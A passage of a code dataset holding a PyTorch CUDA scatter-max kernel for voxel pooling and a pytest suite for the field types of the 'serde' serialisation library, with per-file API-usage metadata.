"utils.KEY.NICKNAME", "line_number": 27, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 27, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 28, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 28, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 29, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 30, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 30, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 31, "usage_type": 
"attribute"}, {"api_name": "utils.KEY", "line_number": 31, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 32, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 32, "usage_type": "name"}, {"api_name": "utils.KEY.REPUTATION", "line_number": 33, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 33, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.KEY.IS_VERIFY", "line_number": 35, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 35, "usage_type": "name"}, {"api_name": "tornado.escape.json_encode", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "393812132", "text": "import torch\n\nfrom ....utils.cuda import (cuda_num_threads, Stream, load_kernel, kernel_loop,\n get_blocks)\nfrom .int_as_float_gpu import int_as_float_gpu\n\nkernel = kernel_loop + \"\"\"\nextern \"C\"\n__global__ void scatter_max(\nconst float* input, const int* cluster, int* max) {\n\n CUDA_KERNEL_LOOP(idx, ${num_threads}) {\n\n const int n_idx = idx / ${M};\n const int m_idx = idx % ${M};\n int c = cluster[n_idx] * ${M} + m_idx;\n\n // Convert value `f` to ordered integer value to perform `atomicMax`.\n int f = __float_as_int(input[idx]);\n f = f >= 0 ? f : f ^ 0x7FFFFFFF;\n\n // Compute `scatter_max`.\n atomicMax((int*) &max[c], f);\n }\n}\n\"\"\"\n\n\ndef scatter_max_gpu(input, cluster, K):\n with torch.cuda.device_of(input):\n M = input.size(1)\n max = torch.cuda.IntTensor(K, M).fill_(-2147483648)\n num_threads = input.numel()\n f = load_kernel('scatter_max', kernel, num_threads=num_threads, M=M)\n f(args=[input.data_ptr(),\n cluster.data_ptr(),\n max.data_ptr()],\n block=(cuda_num_threads, 1, 1),\n grid=(get_blocks(num_threads), 1, 1),\n stream=Stream(ptr=torch.cuda.current_stream().cuda_stream))\n\n return int_as_float_gpu(max)\n", "sub_path": "torch_geometric/nn/functional/max_pool_voxel/scatter_max_gpu.py", "file_name": "scatter_max_gpu.py", "file_ext": "py", "file_size_in_byte": 1259, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.cuda.kernel_loop", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.cuda.device_of", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.cuda.IntTensor", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 32, "usage_type": "attribute"}, {"api_name": "utils.cuda.load_kernel", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.cuda.cuda_num_threads", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.cuda.get_blocks", "line_number": 39, "usage_type": "call"}, {"api_name": "utils.cuda.Stream", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda.current_stream", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "int_as_float_gpu.int_as_float_gpu", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "258716904", "text": "import datetime\nimport uuid\nfrom collections import OrderedDict\n\nfrom pytest import raises\n\nfrom serde import Model\nfrom serde.error import SerdeError, ValidationError\nfrom serde.field import (\n Bool, Choice, Date, DateTime, Dict, Domain, Email, Field, Float, Instance,\n Int, IpAddress, Ipv4Address, Ipv6Address, 
List, MacAddress, Nested, Slug,\n Str, Time, Tuple, Url, Uuid, _resolve_to_field_instance, create\n)\n\n\nclass Stringify(Field):\n\n def serialize(self, value):\n return str(value)\n\n def deserialize(self, value):\n return eval(value)\n\n\nclass TestField:\n\n def test___init__(self):\n field = Field()\n\n assert field.id >= 0\n assert field.rename is None\n assert field.required is True\n assert field.default is None\n assert field.validators == []\n\n # A second Field instantiated should have a higher counter.\n field2 = Field()\n assert field2.id > field.id\n\n # A Field with extra options set.\n field = Field(rename='test', required=False, default=5, validators=[None])\n assert field.rename == 'test'\n assert field.required is False\n assert field.default == 5\n assert field.validators == [None]\n\n def test__setattr__(self):\n field = Field()\n\n with raises(SerdeError):\n class Example(Model):\n a = field\n b = field\n\n def test_name(self):\n field = Field()\n\n with raises(SerdeError):\n field.name()\n\n def test_serialize(self):\n field = Field()\n\n # The base field simply passes things through.\n for value in (None, 0, 'string', object(), type):\n field.serialize(value) == value\n\n def test_deserialize(self):\n field = Field()\n\n # The base field simply passes things through.\n for value in (None, 0, 'string', object(), type):\n field.deserialize(value) == value\n\n def test_validate(self):\n field = Field()\n\n # Everything is okay on a base field.\n for value in (None, 0, 'string', object(), type):\n field.validate(value)\n\n\nclass TestInstance:\n\n def test___init__(self):\n example = Instance(int)\n\n assert example.type == int\n assert example.required is True\n assert example.validators == []\n\n example = Instance(int, required=False, validators=[None])\n assert example.type == int\n assert example.required is False\n assert example.validators == [None]\n\n def test_serialize(self):\n example = Instance(int)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes all values through.\n for value in (None, 0, 'string', object(), type):\n example.serialize(value) == value\n\n def test_deserialize(self):\n example = Instance(int)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes all values through.\n for value in (None, 0, 'string', object(), type):\n example.deserialize(value) == value\n\n def test_validate(self):\n example = Instance(int)\n\n # All integers should pass the validation.\n example.validate(-1000)\n example.validate(0)\n example.validate(1000)\n\n # Anything that is not an int should raise a ValidationError.\n for value in (None, 20.0, 'string', object, type):\n with raises(ValidationError):\n example.validate(value)\n\n\nclass TestDict:\n\n def test_serialize(self):\n # A field that is a key value pair of Strs and Stringifys.\n field = Dict(Str, Stringify)\n\n # Validation only happens when this Field is part of a Model. 
So it\n # still passes any Dict like value through.\n for value in ({}, OrderedDict()):\n field.serialize(value) == value\n\n # Any value that is not an Dict will raise a AttributeError\n # because it doesn't have the `.items()` method.\n for value in (None, 20.0, object, type):\n with raises(AttributeError):\n field.serialize(value)\n\n # Serialize calls the key and value serialize methods.\n assert field.serialize({'a': False, 'b': ['s'], 'c': {'a': 5}}) == \\\n {'a': 'False', 'b': \"['s']\", 'c': \"{'a': 5}\"}\n\n def test_deserialize(self):\n # A field that is a key value pair of Strs and Stringifys.\n field = Dict(Str, Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Dict like value through.\n for value in ({}, OrderedDict()):\n field.deserialize(value) == value\n\n # Any value that is not an Dict will raise a AttributeError\n # because it doesn't have the `.items()` method.\n for value in (None, 20.0, object, type):\n with raises((AttributeError, TypeError)):\n field.deserialize(value)\n\n # Deserialize calls the subfield deserialize method.\n assert field.deserialize({'a': 'False', 'b': \"['s']\", 'c': \"{'a': 5}\"}) == \\\n {'a': False, 'b': ['s'], 'c': {'a': 5}}\n\n def test_validate(self):\n # A field that is a key value pair of Strs and Stringifys.\n field = Dict(Str, Stringify)\n\n # A list of Stringifyiable serializable types will pass validation.\n field.validate({'a': False, 'b': ['s'], 'c': {'a': 5}})\n\n # Any value that is not an Dict will raise a ValidationError\n for value in (None, 20.0, object, type):\n with raises(ValidationError):\n field.validate(value)\n\n # A dictionary of with keys that aren't Strs should fail validation.\n with raises(ValidationError):\n field.validate({5: 'hello'})\n\n\nclass TestList:\n\n def test_serialize(self):\n # A field that must be a list of Stringifys.\n example = List(Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Iterable value through.\n for value in ((), [], {}):\n example.serialize(value) == value\n\n # Any value that is not an Iterable will raise a TypeError\n for value in (None, 20.0, object, type):\n with raises(TypeError):\n example.serialize(value)\n\n # Serialize calls the subfield serialize method.\n assert example.serialize([False, ['s'], {'a': 5}]) == ['False', \"['s']\", \"{'a': 5}\"]\n\n def test_deserialize(self):\n # A field that must be a list of Stringifys.\n example = List(Stringify)\n\n # Validation only happens when this Field is part of a Model. 
So it\n # still passes any Iterable value through.\n for value in ((), [], {}):\n example.deserialize(value) == value\n\n # Any value that is not an Iterable will raise a TypeError\n for value in (None, 20.0, object, type):\n with raises(TypeError):\n example.deserialize(value)\n\n # Deserialize calls the subfield deserialize method.\n assert example.deserialize(['False', \"['s']\", \"{'a': 5}\"]) == [False, ['s'], {'a': 5}]\n\n def test_validate(self):\n # A field that must be a list of Stringifys.\n example = List(Stringify)\n\n # A list of Stryfiable types will pass validation.\n example.validate([False, ['s'], {'a': 5}])\n\n # Any value that is not an Iterable will raise a ValidationError\n for value in (None, 20.0, object, type):\n with raises(ValidationError):\n example.validate(value)\n\n\nclass TestTuple:\n\n def test_serialize(self):\n # A field that is a tuple (bool, str, Stringify)\n example = Tuple(Bool, Str, Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Iterable value through as long as its the correct\n # length.\n for value in ((None, None, None), [None, None, None]):\n example.serialize(value) == value\n\n # Any value that is not an Iterable will raise a TypeError\n for value in (None, 20.0, object, type):\n with raises(TypeError):\n example.serialize(value)\n\n # Serialize calls the subfields serialize methods.\n assert example.serialize((True, 'test', {'a': 5})) == (True, 'test', \"{'a': 5}\")\n\n def test_deserialize(self):\n # A field that is a tuple (bool, str, Stringify)\n example = Tuple(Bool, Str, Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Iterable value through as long as its the correct\n # length.\n for value in ((None, None, 'None'), [None, None, 'None']):\n example.deserialize(value) == value\n\n # Any value that is not an Iterable will raise a TypeError\n for value in (None, 20.0, object, type):\n with raises(TypeError):\n example.deserialize(value)\n\n # Serialize calls the subfields deserialize methods.\n assert example.deserialize((True, 'test', \"{'a': 5}\")) == (True, 'test', {'a': 5})\n\n def test_validate(self):\n # A field that is a tuple (bool, str, Stringify)\n example = Tuple(Bool, Str, Stringify)\n\n # A list of a tuple that will pass validation.\n example.validate((True, 'test', None))\n\n # Any value that is not an Tuple will raise a ValidationError\n for value in (None, 20.0, [None, None, None], object, type, (None, None)):\n with raises(ValidationError):\n example.validate(value)\n\n # A tuple with the incorrect types should also fail with a\n # ValidationError\n with raises(ValidationError):\n example.validate((None, 'test', None))\n\n\nclass TestBool:\n\n def test___init__(self):\n field = Bool(rename='test', required=False, default=False)\n assert field.rename is 'test'\n assert field.required is False\n assert field.default is False\n assert field.validators == []\n\n def test_deserialize(self):\n field = Bool()\n assert field.deserialize(False) is False\n assert field.deserialize(True) is True\n\n def test_validate(self):\n field = Bool()\n field.validate(False)\n field.validate(True)\n\n with raises(ValidationError):\n field.validate('True')\n\n\nclass TestFloat:\n\n def test___init__(self):\n field = Float(rename='test', required=False, default=False)\n assert field.rename is 'test'\n assert field.required is False\n assert field.default is False\n assert field.validators == []\n\n def test_deserialize(self):\n field = Float()\n assert field.deserialize(0.5) == 0.5\n assert field.deserialize(-1000.0) == -1000.0\n\n def test_validate(self):\n field = Float()\n field.validate(-100.0)\n field.validate(0.0)\n field.validate(500.0)\n\n for value in (0, '-1000.0'):\n with raises(ValidationError):\n field.validate(value)\n\n\nclass TestInt:\n\n def test___init__(self):\n field = Int(rename='test', required=False, default=False)\n assert field.rename is 'test'\n assert field.required is False\n assert field.default is False\n assert field.validators == []\n\n def test_deserialize(self):\n field = Int()\n assert field.deserialize(0.5) == 0.5\n assert field.deserialize(-1000.0) == -1000.0\n\n def test_validate(self):\n field = Int()\n field.validate(-100)\n field.validate(0)\n field.validate(500)\n\n for value in (0.0, '500'):\n with raises(ValidationError):\n field.validate(value)\n\n\nclass TestStr:\n\n def test___init__(self):\n field = Str(rename='test', required=False, default=False)\n assert field.rename is 'test'\n assert field.required is False\n assert field.default is False\n assert field.validators == []\n\n def test_deserialize(self):\n field = Str()\n assert field.deserialize('a') == 'a'\n assert field.deserialize(' ') == ' '\n\n def test_validate(self):\n field = Str()\n field.validate('hello')\n field.validate('a')\n\n for value in (None, 5):\n with raises(ValidationError):\n field.validate(value)\n\n\nclass TestChoice:\n\n def test___init__(self):\n field = Choice(range(5), required=False, validators=[])\n assert field.choices == range(5)\n\n def test_validate(self):\n field = Choice(range(5))\n\n field.validate(0)\n field.validate(4)\n\n with raises(ValidationError):\n field.validate('test')\n\n\nclass TestDateTime:\n\n def test___init__(self):\n field = DateTime(format='%Y%m%d %H:%M:%S', required=False)\n assert field.required is False\n assert field.format == '%Y%m%d %H:%M:%S'\n\n def test_serialize(self):\n field = DateTime()\n assert field.serialize(datetime.datetime(2001, 9, 11, 12, 5, 48)) == '2001-09-11T12:05:48'\n\n field = DateTime(format='%Y%m%d %H:%M:%S')\n assert field.serialize(datetime.datetime(2001, 9, 11, 12, 5, 48)) == '20010911 12:05:48'\n\n def test_deserialize(self):\n field = DateTime()\n assert field.deserialize('2001-09-11T12:05:48') == datetime.datetime(2001, 9, 11, 12, 5, 48)\n\n field = DateTime(format='%Y%m%d %H:%M:%S')\n assert field.deserialize('20010911 12:05:48') == datetime.datetime(2001, 9, 11, 12, 5, 48)\n\n\nclass TestDate:\n\n def test_serialize(self):\n field = Date()\n assert field.serialize(datetime.date(2001, 9, 11)) == '2001-09-11'\n\n field = Date(format='%Y%m%d')\n assert field.serialize(datetime.date(2001, 9, 11)) == '20010911'\n\n def test_deserialize(self):\n field = Date()\n assert field.deserialize('2001-09-11') == datetime.date(2001, 9, 11)\n\n field = Date(format='%Y%m%d')\n assert field.deserialize('20010911') == datetime.date(2001, 9, 11)\n\n\nclass TestTime:\n\n def test_serialize(self):\n field = Time()\n assert field.serialize(datetime.time(12, 5, 48)) == '12:05:48'\n\n field = Time(format='%H%M%S')\n assert field.serialize(datetime.time(12, 5, 48)) == '120548'\n\n def test_deserialize(self):\n field = Time()\n assert field.deserialize('12:05:48') == datetime.time(12, 5, 48)\n\n field = Time(format='%H%M%S')\n assert field.deserialize('120548') == datetime.time(12, 5, 48)\n\n\nclass TestDomain:\n\n def test_validate(self):\n field = Domain()\n\n field.validate('www.google.com')\n\n with raises(ValidationError):\n
field.validate('hello')\n\n\nclass TestEmail:\n\n def test_validate(self):\n field = Email()\n\n field.validate('someone@website.com')\n\n with raises(ValidationError):\n field.validate('derp')\n\n\nclass TestIpAddress:\n\n def test_validate(self):\n field = IpAddress()\n\n field.validate('10.0.0.1')\n field.validate('2001:db8:85a3:0:0:8a2e:370:7334')\n\n with raises(ValidationError):\n field.validate('10.0.0.256')\n\n\nclass TestIpv4Address:\n\n def test_validate(self):\n field = Ipv4Address()\n\n field.validate('10.0.0.1')\n\n with raises(ValidationError):\n field.validate('10.0.0.256')\n\n\nclass TestIpv6Address:\n\n def test_validate(self):\n field = Ipv6Address()\n\n field.validate('2001:db8:85a3:0:0:8a2e:370:7334')\n\n with raises(ValidationError):\n field.validate('2001:db8:85a3:0:0:8a2e:370:73345')\n\n\nclass TestMacAddress:\n\n def test_validate(self):\n field = MacAddress()\n\n field.validate('3a:00:40:82:ad:00')\n\n with raises(ValidationError):\n field.validate('3a:00:40:82:a:00')\n\n\nclass TestSlug:\n\n def test_validate(self):\n field = Slug()\n\n field.validate('a_b-10')\n\n with raises(ValidationError):\n field.validate('a!')\n\n\nclass TestUrl:\n\n def test_validate(self):\n field = Url()\n\n field.validate('http://www.google.com/search?q=test')\n\n with raises(ValidationError):\n field.validate('derp')\n\n\nclass TestUuid:\n\n def test___init__(self):\n field = Uuid(required=False, default=uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e'))\n\n assert field.required is False\n assert field.default == uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e')\n\n def test_serialize(self):\n field = Uuid()\n\n assert field.serialize(uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e')) == \\\n '2d7026c8-cc58-11e8-bd7a-784f4386978e'\n\n def test_deserialize(self):\n field = Uuid()\n\n assert field.deserialize('2d7026c8-cc58-11e8-bd7a-784f4386978e') == \\\n uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e')\n\n def test_validate(self):\n field = Uuid()\n\n field.validate(uuid.UUID('2d7026c8-cc58-11e8-bd7a-784f4386978e'))\n\n with raises(ValidationError):\n field.validate('2d7026c8-cc58-11e8-bd7a-784f4386978e')\n\n\ndef test__resolve_to_field_instance():\n # An instance of a field should work\n assert _resolve_to_field_instance(Field()) == Field()\n\n # A Field class should work\n assert _resolve_to_field_instance(Field) == Field()\n\n # A Model class should work\n class Example(Model):\n pass\n\n assert _resolve_to_field_instance(Example) == Nested(Example)\n\n # All the base types should resolve correctly\n assert _resolve_to_field_instance(bool) == Bool()\n assert _resolve_to_field_instance(dict) == Dict()\n assert _resolve_to_field_instance(float) == Float()\n assert _resolve_to_field_instance(int) == Int()\n assert _resolve_to_field_instance(list) == List()\n assert _resolve_to_field_instance(str) == Str()\n assert _resolve_to_field_instance(tuple) == Tuple()\n\n # A Model instance should not work\n with raises(TypeError):\n _resolve_to_field_instance(Example())\n\n with raises(TypeError):\n _resolve_to_field_instance(Example())\n\n\ndef test_create():\n # Create a Field with a new serialize and deserialize method.\n Reversed = create( # noqa: N806\n 'Example',\n base=Str,\n serializers=[lambda s: s[::-1]],\n deserializers=[lambda s: s[::-1]]\n )\n\n class Example(Model):\n a = Reversed()\n\n example = Example.from_dict({'a': 'test'})\n assert example.a == 'tset'\n assert example.to_dict() == {'a': 'test'}\n\n # Create a Field with a new validate method.\n def validate_is_not_derp(value):\n assert value != 'derp'\n\n class Example(Model):\n a = create('NotDerp', Str, validators=[validate_is_not_derp])()\n\n assert Example('notderp').a == 'notderp'\n\n with raises(ValidationError):\n Example('derp')\n\n assert issubclass(create('Example'), Field)\n", "sub_path": "tests/test_field.py", "file_name": "test_field.py", "file_ext": "py", "file_size_in_byte": 18929, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "serde.field.Field", "line_number": 16, "usage_type": "name"}, {"api_name": "serde.field.Field", "line_number": 28, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 37, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 41, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 48, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 50, "usage_type": "call"}, {"api_name": "serde.error.SerdeError", "line_number": 50, "usage_type": "argument"}, {"api_name": "serde.Model", "line_number": 51, "usage_type": "name"}, {"api_name": "serde.field.Field", "line_number": 56, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 58, "usage_type": "call"}, {"api_name": "serde.error.SerdeError", "line_number": 58, "usage_type": "argument"}, {"api_name": "serde.field.Field", "line_number": 62, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 69, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 76, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 86, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 92, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 98, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 106, "usage_type": "call"}, {"api_name": "serde.field.Instance", "line_number": 114, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 123, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 123, "usage_type": "argument"}, {"api_name": "serde.field.Dict", "line_number": 131, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 131, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 135, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 141, "usage_type": "call"}, {"api_name": "serde.field.Dict", "line_number": 150, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 150, "usage_type": "argument"}, {"api_name": "collections.OrderedDict", "line_number": 154, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 160, "usage_type": "call"}, {"api_name": "serde.field.Dict", "line_number": 169, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 169, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 176, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 176, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 180, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 180, "usage_type": "argument"}, {"api_name": "serde.field.List", "line_number": 188, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 197, "usage_type": "call"}, {"api_name": "serde.field.List", "line_number": 205, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 214, "usage_type": "call"},
{"api_name": "serde.field.List", "line_number": 222, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 229, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 229, "usage_type": "argument"}, {"api_name": "serde.field.Tuple", "line_number": 237, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 237, "usage_type": "argument"}, {"api_name": "serde.field.Str", "line_number": 237, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 247, "usage_type": "call"}, {"api_name": "serde.field.Tuple", "line_number": 255, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 255, "usage_type": "argument"}, {"api_name": "serde.field.Str", "line_number": 255, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 265, "usage_type": "call"}, {"api_name": "serde.field.Tuple", "line_number": 273, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 273, "usage_type": "argument"}, {"api_name": "serde.field.Str", "line_number": 273, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 280, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 280, "usage_type": "argument"}, {"api_name": "pytest.raises", "line_number": 285, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 285, "usage_type": "argument"}, {"api_name": "serde.field.Bool", "line_number": 292, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 299, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 304, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 308, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 308, "usage_type": "argument"}, {"api_name": "serde.field.Float", "line_number": 315, "usage_type": "call"}, {"api_name": "serde.field.Float", "line_number": 322, "usage_type": "call"}, {"api_name": "serde.field.Float", "line_number": 327, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 333, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 333, "usage_type": "argument"}, {"api_name": "serde.field.Int", "line_number": 340, "usage_type": "call"}, {"api_name": "serde.field.Int", "line_number": 347, "usage_type": "call"}, {"api_name": "serde.field.Int", "line_number": 352, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 358, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 358, "usage_type": "argument"}, {"api_name": "serde.field.Str", "line_number": 365, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 372, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 377, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 382, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 382, "usage_type": "argument"}, {"api_name": "serde.field.Choice", "line_number": 389, "usage_type": "call"}, {"api_name": "serde.field.Choice", "line_number": 393, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 398, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 398, "usage_type": "argument"}, {"api_name": "serde.field.DateTime", "line_number": 405, "usage_type": "call"}, {"api_name": "serde.field.DateTime", "line_number": 410, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 411, "usage_type": "call"}, 
{"api_name": "serde.field.DateTime", "line_number": 413, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 414, "usage_type": "call"}, {"api_name": "serde.field.DateTime", "line_number": 417, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 418, "usage_type": "call"}, {"api_name": "serde.field.DateTime", "line_number": 420, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 421, "usage_type": "call"}, {"api_name": "serde.field.Date", "line_number": 427, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 428, "usage_type": "call"}, {"api_name": "serde.field.Date", "line_number": 430, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 431, "usage_type": "call"}, {"api_name": "serde.field.Date", "line_number": 434, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 435, "usage_type": "call"}, {"api_name": "serde.field.Date", "line_number": 437, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 438, "usage_type": "call"}, {"api_name": "serde.field.Time", "line_number": 444, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 445, "usage_type": "call"}, {"api_name": "serde.field.Time", "line_number": 447, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 448, "usage_type": "call"}, {"api_name": "serde.field.Time", "line_number": 451, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 452, "usage_type": "call"}, {"api_name": "serde.field.Time", "line_number": 454, "usage_type": "call"}, {"api_name": "datetime.time", "line_number": 455, "usage_type": "call"}, {"api_name": "serde.field.Domain", "line_number": 461, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 465, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 465, "usage_type": "argument"}, {"api_name": "serde.field.Email", "line_number": 472, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 476, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 476, "usage_type": "argument"}, {"api_name": "serde.field.IpAddress", "line_number": 483, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 488, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 488, "usage_type": "argument"}, {"api_name": "serde.field.Ipv4Address", "line_number": 495, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 499, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 499, "usage_type": "argument"}, {"api_name": "serde.field.Ipv6Address", "line_number": 506, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 510, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 510, "usage_type": "argument"}, {"api_name": "serde.field.MacAddress", "line_number": 517, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 521, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 521, "usage_type": "argument"}, {"api_name": "serde.field.Slug", "line_number": 528, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 532, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 532, "usage_type": "argument"}, {"api_name": "serde.field.Url", "line_number": 539, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 543, "usage_type": "call"}, {"api_name": 
"serde.error.ValidationError", "line_number": 543, "usage_type": "argument"}, {"api_name": "serde.field.Uuid", "line_number": 550, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 550, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 553, "usage_type": "call"}, {"api_name": "serde.field.Uuid", "line_number": 556, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 558, "usage_type": "call"}, {"api_name": "serde.field.Uuid", "line_number": 562, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 565, "usage_type": "call"}, {"api_name": "serde.field.Uuid", "line_number": 568, "usage_type": "call"}, {"api_name": "uuid.UUID", "line_number": 570, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 572, "usage_type": "call"}, {"api_name": "serde.error.ValidationError", "line_number": 572, "usage_type": "argument"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 578, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 578, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 581, "usage_type": "call"}, {"api_name": "serde.field.Field", "line_number": 581, "usage_type": "argument"}, {"api_name": "serde.Model", "line_number": 584, "usage_type": "name"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 587, "usage_type": "call"}, {"api_name": "serde.field.Nested", "line_number": 587, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 590, "usage_type": "call"}, {"api_name": "serde.field.Bool", "line_number": 590, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 591, "usage_type": "call"}, {"api_name": "serde.field.Dict", "line_number": 591, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 592, "usage_type": "call"}, {"api_name": "serde.field.Float", "line_number": 592, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 593, "usage_type": "call"}, {"api_name": "serde.field.Int", "line_number": 593, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 594, "usage_type": "call"}, {"api_name": "serde.field.List", "line_number": 594, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 595, "usage_type": "call"}, {"api_name": "serde.field.Str", "line_number": 595, "usage_type": "call"}, {"api_name": "serde.field._resolve_to_field_instance", "line_number": 596, "usage_type": "call"}, {"api_name": "serde.field.Tuple", "line_number": 596, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 599, "usage_type": "call"}, {"api_name": 